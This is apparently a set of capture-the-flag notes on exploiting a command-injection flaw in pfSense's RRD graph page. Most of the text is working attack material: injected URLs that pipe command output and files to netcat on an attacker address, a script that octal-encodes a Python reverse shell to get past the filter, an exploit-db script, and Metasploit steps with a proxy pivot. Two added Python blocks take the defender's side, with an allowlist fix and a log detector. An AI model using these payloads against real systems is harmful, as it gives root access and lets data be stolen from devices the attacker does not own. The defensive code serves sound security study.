pfSense

Exec Code Exploit

  • google: pfsense cve

    • cvedetails.com

      • bright red ones for 'pfsense'

      • 'exec code' as indicator

    • Use: CVE-2014-4688 (only a 6.5 score)

    • exploitdb: 43560 ..interesting

  • google: pfsense 2.1.3 changelog

    • Found: Nov 11, 2014 New Features

  • google: pfsense exploits ..find good blogpost

    • proteansec - pt4: directory traversal

    • proteansec - pt2: command injection

    • status_rrd_graph_img.php ..still unpatched, we will use this one

Mixed Results

  • Had trouble following these examples from ippsec

pfsense > status > RRD Graphs

Clean up the link:
https://$IP/status_rrd_graph_img.php?database=system-processor.rrd
https://$IP/status_rrd_graph_img.php?database=queues               ..from exploit/blog
https://$IP/status_rrd_graph_img.php?database=queues;sleep+10      ..worked!
https://$IP/status_rrd_graph_img.php?database=queues;echo+ippsec   ..ugly results
https://$IP/status_rrd_graph_img.php?database=queues;echo+ippsec|nc+10.10.14.6+9000
.. queues;echo+whoami|nc+10.10.14.6+9000    .. root
.. queues;echo+hostname|nc+10.10.14.6+9000  .. pfSense
nc -nvlp 9001

------------------------------
More:
.. queues;echo+abc|nc+10.10.14.6+9000    ..works
.. queues;find+/|nc+10.10.14.6+9000      ..fails (find / ..the slash is blocked)
.. queues;find+.|nc+10.10.14.6+9000      ..ok
nc -lvnp 9001 > filesystem.txt           ..catch

.. queues;echo+abc|nc+10.10.14.6+9000    ..ok
.. queues;echo+abc/|nc+10.10.14.6+9000   ..fails (slash blocked)
.. queues;env|nc+10.10.14.6+9000    ..get environment HOME=/

.. queues;echo+$(HOME)|nc+10.10.14.6+9000    ..get environment HOME=/
.. queues;FIND+$(HOME)|nc+10.10.14.6+9000    ..FIND /  ..NOW WORKS
.. queues;cat+$(HOME)home$(HOME)rohit$(HOME)user.txt|nc+10.10.14.6+9001

nc -lvnp 9001 > filesystem.txt      
grep root.txt filesystem.txt
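The filter met above is a blocklist: it refuses slashes and dashes, but a value built without them (";sleep 10", "$(HOME)home$(HOME)rohit") still reaches the shell. Below is an added example, not pfSense's own code, that models that blocklist next to the fix a defender wants: map the parameter onto the files that actually exist and pass it as an argv element, never through a shell. RRD_DIR, the file names, the rrdtool argv layout and the requirement that the parameter carries its .rrd extension are assumptions.

```python
#!/usr/bin/env python3
# Added example, not pfSense's code: the blocked-character filter seen in the
# notes modelled as a blocklist, next to an allowlist fix that maps the
# parameter onto real files and never hands it to a shell.
# RRD_DIR, the file names and the rrdtool argv layout are assumptions.
import os
import re
import tempfile

# Constructed stand-in for the RRD directory; only these files are legitimate.
RRD_DIR = tempfile.mkdtemp(prefix="rrd-example-")
for _name in ("system-processor.rrd", "queues.rrd", "wan-throughput.rrd"):
    open(os.path.join(RRD_DIR, _name), "w").close()

BLOCKED_CHARS = "/-"  # what the notes observed being rejected


def blocklist_accepts(database: str) -> bool:
    """Blocklist model: only the listed characters are refused, so a value
    built without them (";sleep 10", "$(HOME)home...") still passes."""
    return not any(c in BLOCKED_CHARS for c in database)


def vulnerable_command(database: str) -> str:
    """The string a shell=True call would receive when the parameter is
    concatenated in. Returned for inspection only, never executed."""
    return "rrdtool fetch " + os.path.join(RRD_DIR, database) + " AVERAGE"


_RRD_NAME = re.compile(r"^[A-Za-z0-9_-]+\.rrd$")
_RRD_ROOT = os.path.realpath(RRD_DIR)


def allowlisted_path(database: str) -> str:
    """Allowlist fix: the value must look like an RRD file name and resolve to
    an existing file directly inside RRD_DIR; anything else is rejected."""
    if not _RRD_NAME.match(database):
        raise ValueError(f"rejected database name: {database!r}")
    path = os.path.realpath(os.path.join(RRD_DIR, database))
    if os.path.dirname(path) != _RRD_ROOT or not os.path.isfile(path):
        raise ValueError(f"unknown database: {database!r}")
    return path


def is_rejected(database: str) -> bool:
    """True when the allowlist refuses the value."""
    try:
        allowlisted_path(database)
    except ValueError:
        return True
    return False


def safe_argv(database: str) -> list:
    """argv for subprocess.run(argv) with shell=False: no shell parses the
    value, so metacharacters in it cannot start a second command."""
    return ["rrdtool", "fetch", allowlisted_path(database), "AVERAGE"]


if __name__ == "__main__":
    for value in ("system-processor.rrd", "queues;sleep 10",
                  "queues;cat $(HOME)home$(HOME)rohit$(HOME)user.txt"):
        print(f"{value!r}: blocklist accepts={blocklist_accepts(value)} "
              f"allowlist rejects={is_rejected(value)}")
        print("   shell would see:", vulnerable_command(value))
```

Note that the blocklist even refuses the legitimate name system-processor.rrd because of its dash, while letting the ";sleep 10" value through; the allowlist does the opposite, which is the behaviour you want.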

------------------------------
Python Reverse Shell

vim cmd  ..file with the Python reverse shell, connect(("10.10.14.6",1234))
nc -nvlp 9001 < cmd   ..serve the file
nc -nvlp 1234         ..catch the shell
..queues;nc+10.10.10.6+9001|python+&   ..fail
..queues;nc+10.10.10.6+9001|python     ..ok: pulls the file, python executes it
connected!

gobuster - 45 minutes

> gobuster dir -w medium.txt -u https://10.x.x.x -k -x php,txt,conf,bak
/system-users.txt  ..found username!!!

More Injections

https://10.x.x.x/status_rrd_graph_img.php?database=queues;cd+..;cd+..;cd+..;cd+usr;cd+local;cd+www;id%3Ecmd.txt
https://10.x.x.x/cmd.txt  ..view results

https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|command|echo%20
https://10.x.x.x/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20OCTET_ENCODED_SHELLCODE|sh|echo%20

Octal Code to Injection

  • If Dashes and Slashes are Blocked

  • Use Octal Encoding

#!/usr/bin/env python3
# Octal-encode a command so it contains no slashes or dashes; printf on the
# target turns the \NNN escapes back into the original bytes.
# Inner strings use double quotes so the single-quoted -c argument stays
# intact when sh parses it (single quotes inside would end it early).
command = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.10\",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
payload = ""
for char in command:
    payload += "\\" + oct(ord(char))[2:]  # oct() gives '0o160'; drop the prefix
print(payload)

---------------------
Result:
\160\171\164\150\...

Verify:
printf '\160\171\164\150\...'
python -c 'import socket...   ..worked!


---------------------
Octal Injection!
https://10.x.x.x/status_rrd_graph_img.php?database=queues;printf+%27\160\171\164\150\...%27|sh
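From the defender's side, the plain payloads in the database= section and the octal-encoded one here leave the same trace in the web server log: a request to status_rrd_graph_img.php whose database or graph parameter carries shell control characters. The following detector is an added example, not part of the notes or of pfSense; it replays the requests above as constructed log lines, URL-decodes the query and also decodes the printf-style \NNN escapes so the analyst sees the command in readable form. The log format, the SAFE_NAME pattern and the reason labels are assumptions.

```python
#!/usr/bin/env python3
# Added example, not from the notes or from pfSense: a detector for the
# injection attempts above, run over constructed access-log lines.
# Log format, field names and the SAFE_NAME pattern are assumptions.
import re
from urllib.parse import unquote_plus

VULN_SCRIPTS = {"/status_rrd_graph_img.php"}
PARAMS = ("database", "graph")                 # both injection points used above
META = re.compile(r"[;|&`<>\n]|\$\(|\$\{")     # shell control sequences
OCTAL = re.compile(r"\\([0-7]{1,3})")          # printf-style octal escapes
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]*$")   # what an RRD name may contain
LOG_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')

# Constructed log lines (not real traffic) replaying the requests above.
LOG_LINES = [
    '10.10.14.6 - - [01/Jan/2024:10:00:00 +0000] "GET /status_rrd_graph_img.php?database=system-processor.rrd HTTP/1.1" 200 5120',
    '10.10.14.6 - - [01/Jan/2024:10:00:05 +0000] "GET /status_rrd_graph_img.php?database=queues;sleep+10 HTTP/1.1" 200 0',
    '10.10.14.6 - - [01/Jan/2024:10:00:09 +0000] "GET /status_rrd_graph_img.php?database=queues;cat+$(HOME)home$(HOME)rohit$(HOME)user.txt%7Cnc+10.10.14.6+9001 HTTP/1.1" 200 0',
    '10.10.14.6 - - [01/Jan/2024:10:00:12 +0000] "GET /status_rrd_graph_img.php?database=queues;printf+%27\\160\\171\\164\\150\\157\\156%27%7Csh HTTP/1.1" 200 0',
    '10.10.14.6 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php HTTP/1.1" 200 1234',
]


def decode_octal(value: str) -> str:
    """Decode \\NNN escapes the way printf would, so the payload reads as text."""
    return OCTAL.sub(lambda m: chr(int(m.group(1), 8)), value)


def query_params(target: str):
    """Split the request target into path and decoded parameters.
    Split on '&' only: some query parsers (older urllib.parse.parse_qs among
    them) also split on ';', which would swallow the injected command."""
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, val = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(val)
    return path, params


def inspect_line(line: str):
    """None for a benign line, else the parameter, the reasons and the decoded value."""
    m = LOG_RE.search(line)
    if not m:
        return None
    path, params = query_params(m.group("target"))
    if path not in VULN_SCRIPTS:
        return None
    for key in PARAMS:
        value = params.get(key)
        if value is None:
            continue
        reasons = []
        if META.search(value):
            reasons.append("shell-metacharacter")
        if OCTAL.search(value):
            reasons.append("octal-escape")
        if not SAFE_NAME.match(value):
            reasons.append("not-an-rrd-name")
        if reasons:
            return {"param": key, "reasons": reasons, "decoded": decode_octal(value)}
    return None


def scan(lines):
    """(index, finding) for every line that looks like an injection attempt."""
    findings = []
    for i, line in enumerate(lines):
        hit = inspect_line(line)
        if hit:
            findings.append((i, hit))
    return findings


if __name__ == "__main__":
    for i, hit in scan(LOG_LINES):
        print(i, hit["param"], hit["reasons"], hit["decoded"])
```

The legitimate request for system-processor.rrd and the unrelated index.php request produce nothing; the three injection lines are reported, and the octal one is shown as the decoded string "queues;printf 'python'|sh" rather than as a run of escapes.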

Easy Exploit

searchsploit -m php/webapps/43560.py
exploit-db 43560 > python command injection script
python3 43560.py --rhost 10.x.x.x --lhost 10.x.x.x --lport 4444 --username rohit --password pfsense
nc -nvlp 4444
whoami ..root

Metasploit

  • Plus a SOCKS pivot from another box (since we were banned)

service postgresql start 
msfconsole
search pfsense 
graph injection
locate pfsense_graph

use exploit/unix/http/pfsense_graph_injection_exec
set RHOST $IP
set USERNAME rohit
set PASSWORD pfsense
set LHOST tun0
set Proxies socks5:127.0.0.1:1080
set ReverseAllowProxy true
exploit
m> shell
m> hostname
